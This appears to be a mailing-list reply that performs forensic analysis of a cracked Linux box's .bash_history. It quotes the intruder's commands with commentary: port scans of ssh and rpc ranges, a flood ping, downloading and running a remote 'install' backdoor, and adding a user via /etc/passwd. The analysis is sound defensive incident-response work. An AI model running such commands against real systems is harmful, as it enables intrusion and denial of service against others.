Dzuy M. Nguyen wrote: > Can someone help me figure out this "/.bash_history" from my > computer that someone cracked into and did some damage. > > I'll probably re-install the box, but I'd like to see what they did > before I destroy it. I've attached the "/.bash_history".
Let's cut it down some.. > cc anatomy.c -o anatomy > cc kod.c -o kofd > cp kofd kod > rm kofd According to google, kod and kofd are related to the oracle database. It's possible this is a cooincidence, or he was using these names to try to appear innocous (weird choices though; 'sh' is better..) It's odd he made them and immediatly deleted them -- unless he was logged in twice and went and used them in between. > ./anatomy 216.209.196.154 22 > ./anatomy 216.209.205.68 22 > ./anatomy 216.209.207.150 22 I'd guess anatomy is some kind of port scanner. 22 is the ssh port. > tar -zxvf bnc2_6_4_tar.gz > cd bnc2.6.4 > ./configure > make > make install bnc2 is a irc proxy server. Home page is http://bnc.dragondata.com/, a file by the same name as what he untarred is at http://bnc.dragondata.com/ > cd small > mkdir .shit > cd .shit > chmod 777 * > chmod +s * > chmod 666 * > chmod 777 * I'd assume he is ftping or scping or something files onto your box, since files seem to have just appeared here. Probably ftp, since the permissions had to be fixed up. Might be useful to see if anything shows up in the logs for daemons that can transfer files. > ./pscan > ./b > ./pscan 167.64 111 Presumably a port scanner that operates on whole networks. Port 111 is the run rpc port, so he's probably interested in nfs exploits or related thing here. > ./pscan 195.54 111 > cat wuftp.log > ./b 195.54.3.134 > ./b 195.54.29.7 > ./b 195.54.221.21 It looks like 'b' is his mode of attack after he portscans and finds new victims. > ping -f newsforlinux.com A little malicious flood pinging always brightens up the day.. > ftp columbia.digiweb.com > tar -zxvf linux.tar.gz > cd .bd > ./install Hm. Since columbia.digiweb.com has no open ftp server, or kernel mirror that I can see, I doubt this is really the kernel. > cat /etc/passwd > pico /ec/passwd > cat .bash_history > passwd z > cat /etc/passwd Adds a user, be sure to delete that user immediatly... Of course, you probably want to back up the system and reinstall from scratch. -- see shy jo
